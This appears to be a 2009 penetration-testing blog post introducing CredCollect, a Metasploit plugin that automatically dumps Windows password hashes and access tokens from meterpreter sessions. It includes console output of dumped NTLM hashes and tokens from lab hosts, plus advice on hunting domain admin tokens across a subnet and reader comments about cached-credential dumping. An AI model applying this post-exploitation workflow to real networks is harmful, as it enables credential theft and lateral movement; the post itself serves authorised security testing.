Thursday, April 2, 2009

Automatic credential collection and storage with CredCollect


In previous posts here at Carnal0wnage, CG has diligently covered using MSF and meterpreter to do all kinds of stuff, including grabbing hashes with the Priv extension (Vinnie Liu) and tokens with the Incognito extension (Luke Jennings). These are powerful post-exploitation features that yield invaluable information to the engaging team, therefore the presentation and accessibility of this data becomes an important factor as the scale of the engagement and number of targets grows. CredCollect is a simple plugin for MSF that hooks meterpreter session events and performs the gathering and persistent storage of this data for you transparently.

Upon successful session creation, the CredCollect plugin determines if the session opened is indeed a meterpreter session, loads the Priv and Incognito extensions, and extracts the hashes and tokens from the target. The plugin then stores each hash and token as a Note in the database of the framework instance and hands the session back to the console for the user to interact with it at the standard meterpreter> prompt.

The plugin also adds two commands to the MSF console when loaded named db_hashes and db_tokens respectively. The db_hashes command prints all of the hashes accrued in the database in a format suitable for import into various password crackers (OphCrack, L0pht, etc). The db_tokens command simply prints all of the tokens in the database with the host they were found on.

msf > help

credcollect Commands
====================
Command Description
------- -----------
db_hashes Dumps hashes collected in the database
db_tokens Dumps tokens collected in the database with host information

The utility of this plugin is best realized in medium to large scale engagements (read: beaucoup shellz) such as internal engagements or external phishing campaigns that result in multiple parallel sessions returning to the team at unpredicted rates and times.

Some common scenarios of use and bite-sized demos:

The db_hashes command is useful after a day or two of sweeping for low hanging fruit and pilfering hashes. The team can easily export all of the credentials that were transparently collected in the database and start cracking them for the next phase of the attack.


msf auxiliary(psexec) >
[*] Meterpreter session 1 opened (192.168.216.128:35998 -> 192.168.216.129:35660)
[*] This is CredCollect, I have the conn!

[*] Meterpreter session 2 opened (192.168.216.128:39631 -> 192.168.216.135:13276)
[*] This is CredCollect, I have the conn!

[*] Meterpreter session 3 opened (192.168.216.128:59599 -> 192.168.216.130:29261)
[*] This is CredCollect, I have the conn!

[*] Meterpreter session 4 opened (192.168.216.128:40972 -> 192.168.216.134:19663)
[*] This is CredCollect, I have the conn!

msf auxiliary(psexec) > db_hashes
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
ASPNET:1003:f23cfdf84c392fbc77c0e0f2917836b0:01d86d700f9ea6ad3aa8bbdfcf521cac:::
batman:1005:efdb5ed3696653c9aad3b435b51404ee:b7265f8cc4f00b58f413076ead262720:::
cmonster:1004:c1e93c824b1cfaa8aad3b435b51404ee:8969a961103af73fcc0748e43c5ff7f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_LAB-B2257C3B992:1001:5124477c769fbec46266a2cb1c844b3f:a9f888877ce9df5216bbc08b31e43e3d:::
IWAM_LAB-B2257C3B992:1002:b36530029b636023d96dccb509274796:2b37090e60171bb7e654def4801070ee:::
labadmin:1000:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
batman:1004:efdb5ed3696653c9aad3b435b51404ee:b7265f8cc4f00b58f413076ead262720:::
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
ASPNET:1003:37a6404c8dd5bfbd531e60cb30342487:d180f9afa235590ce7b2ee87fb5f931b:::
batman:1004:efdb5ed3696653c9aad3b435b51404ee:b7265f8cc4f00b58f413076ead262720:::
dknuth:1005:a2c541b4541eb1b0aad3b435b51404ee:a86f1e9a32b9e448d2489b3a6e54430b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bgates:1005:aa79e536edfc475e1fd352bdd2352014:535aa08a36ce010447800ef9308f056e:::
IME_ADMIN:1003:4da9826b50892c5d00aa4eedb6ef32d3:b863209024a2f29f7f614cbb9ec4c8cd:::
IME_USER:1002:4da9826b50892c5d00aa4eedb6ef32d3:b863209024a2f29f7f614cbb9ec4c8cd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_LAB-F1F8AF69593:1000:fe4a20238f2f142b5ddd0be5f2a79e05:5e16d29ec4eda6ab28630283b41351cc:::
IWAM_LAB-F1F8AF69593:1001:9810533c7118c42e56ab6132ae49abcb:9942f80a8065ef33d1d9ed3cf542094c:::
labadmin:1000:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
batman:1004:efdb5ed3696653c9aad3b435b51404ee:b7265f8cc4f00b58f413076ead262720:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:7c02152d1cc79a43a82647b338f3300a:6d95eda25c0726fbaf0b31217ed6ac48:::
kgriffey:1005:263ec07d6b3acc9caad3b435b51404ee:5af89060a89b58d912dd991dde9e9bbd:::
lab:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ca221df23070348c4225ad0f20d31d30:::

The db_tokens command is useful in situations where you seek a specific user token and want to know if you've found that token on any of the boxes the team has compromised. For example, if you were to own a local service account or backup admin account, you could plug those credentials into psexec_scanner and automate searching an entire subnet or domain for a box with a domain admin token on it that you have gained access to.


msf auxiliary(psexec) > db_tokens
192.168.216.135 - LAB-B2257C3B992\labadmin
192.168.216.135 - NT AUTHORITY\SYSTEM
192.168.216.135 - NT AUTHORITY\ANONYMOUS LOGON
192.168.216.134 - LAB-F1F8AF69593\Administrator
192.168.216.134 - NT AUTHORITY\SYSTEM
192.168.216.134 - NT AUTHORITY\ANONYMOUS LOGON
192.168.216.129 - LAB-S1MG7462FL1\lab
192.168.216.129 - NT AUTHORITY\LOCAL SERVICE
192.168.216.129 - NT AUTHORITY\NETWORK SERVICE
192.168.216.129 - NT AUTHORITY\SYSTEM
192.168.216.129 - NT AUTHORITY\ANONYMOUS LOGON
192.168.216.130 - LAB-B2257C3B992\batman
192.168.216.130 - NT AUTHORITY\SYSTEM
192.168.216.130 - LAB-B2257C3B992\labadmin
192.168.216.130 - NT AUTHORITY\ANONYMOUS LOGON

As you can see highlighted, we have found the desired 'batman' user token is accessible on '192.168.216.130'.

And at the end of the day, all of these are just Note's in the MSF database so you can display them as such, or query the information from the actual database file with any sqlite client.


msf auxiliary(psexec) > db_notes
[*] Time: Thu Mar 26 01:05:18 -0700 2009 Note: host=192.168.216.130 type=auth_SMB data=AUTH 192.168.216.130:445 Administrator password
[*] Time: Thu Mar 26 01:05:18 -0700 2009 Note: host=192.168.216.134 type=auth_SMB data=AUTH 192.168.216.134:445 Administrator password
[*] Time: Thu Mar 26 01:05:18 -0700 2009 Note: host=192.168.216.135 type=auth_SMB data=AUTH 192.168.216.135:445 Administrator password
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host=192.168.216.130 type=auth_TOKEN data=LAB-B2257C3B992\batman
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host=192.168.216.130 type=auth_TOKEN data=NT AUTHORITY\SYSTEM
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host=192.168.216.130 type=auth_TOKEN data=LAB-B2257C3B992\labadmin
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host=192.168.216.130 type=auth_TOKEN data=NT AUTHORITY\ANONYMOUS LOGON

So you can load the CredCollect plugin at startup and transparently collect credential information, also, since the initial implementation of this code was in a meterpreter script, you can drop the credcollect meterpreter script in your scripts directory and use it in one-off cases or whatever if you feel more comfortable doing it manually than loading the plugin.

Source or it didn't happen..

Plugin - Script

This plugin was definitely inspired by a similar effort that Valsmith and Colin Ames (now of AttackResearch) presented at DefCon 16 in their talk 'Meta-Post Exploitation' called MetaPass but to my knowledge that plugin was never publicly released.

PS. For a while a hairy thread issue kept this thing from working reliably so I'd like to thank egypt and icer for helping me debug it and track it down and hdm for ultimately fixing it in Changeset 6831
dfgsf

5 comments:

Anonymous said...

Is there a plugin for meterpreter used to collect cached domain credentials (aka MS Cache Hash) ?

Currently I do this by uploading and executing externel program (e.g. cachedump.exe) on target box.

CG said...

not yet but i think people are working on it

Anonymous said...

You mention something called psexec_scanner but I can't seem to find it via google and I don't see it after svn updating my msf. Is this a private tool or am I just a google retard?

jcran said...

scanner/smb/login == psexec_scannner

Anonymous said...

Has anybody implemented a ruby script for meterpreter, which can handle domain cached credentials now
(port of C code from cachedump.exe or python from creddump) ?

Maybe this and support for logon session hashes will come with version 3.5 ...